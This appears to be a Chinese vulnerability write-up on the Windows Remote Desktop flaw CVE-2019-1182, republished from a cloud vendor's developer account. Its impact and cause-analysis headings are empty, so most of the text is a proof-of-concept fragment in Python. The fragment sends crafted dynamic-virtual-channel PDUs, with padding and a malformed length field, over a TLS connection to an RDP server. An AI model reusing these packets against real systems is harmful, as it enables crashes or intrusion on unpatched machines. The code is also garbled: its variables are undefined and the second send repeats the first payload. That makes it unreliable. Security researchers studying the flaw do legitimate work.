本文主要通过对CVE-2019-1182漏洞进行分析,让大家对于漏洞的成因及漏洞修复有一个更加全面的认识。
补丁:windows10.0-kb4512508-x64_1893edc9a11d760be11e49d2500170ceee8026d7
漏洞危害
成因分析
poc构造
dvc_send = ( #pdu header
"0300004002F08064000503EC70322A00000003000000" #
1st byte cid length
"68" + channel_id[-
2:] +
"01110000" #data
"414141414141414141414141414141414141414141414141414141"
"414141414141414141414141414141414141414141414141414141"
"414141414141414141414141414141414141414141414141414141"
"414141414141414141414141414141414141414141414141414141"
"414141414141414141414141414141414141414141414141414141"
"414141414141414141414141414141414141414141414141414141" ) tls.sendall(Packer(dvc_send).bin_unpack())
dvc_send2 = (
"0300004002F08064000503EC70322A00000003000000"
"68" + channel_id[-
2:] +
"01E0FFFF"
"e122550e0ffff080000002690ce0a2b9f6401070000002630d2b4fc0402" ) tls.sendall(Packer(dvc_send).bin_unpack())
点击【阅读原文】,获取更多信息~
[1] https://msrc-blog.microsoft.com/2019/08/13/patch-new-wormable-vulnerabilities-in-remote-desktop-services-cve-2019-1181-1182/
[2] https://github.com/algo7/bluekeep_CVE-2019-0708_poc_to_exploit
[3] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5073f4ed-1e93-45e1-b039-6e30c385867c
[4] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpedyc/3bd53020-9b64-4c9a-97fc-90a79e7e1e06
本文分享自微信公众号 - 京东云开发者(JDT_Developers)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。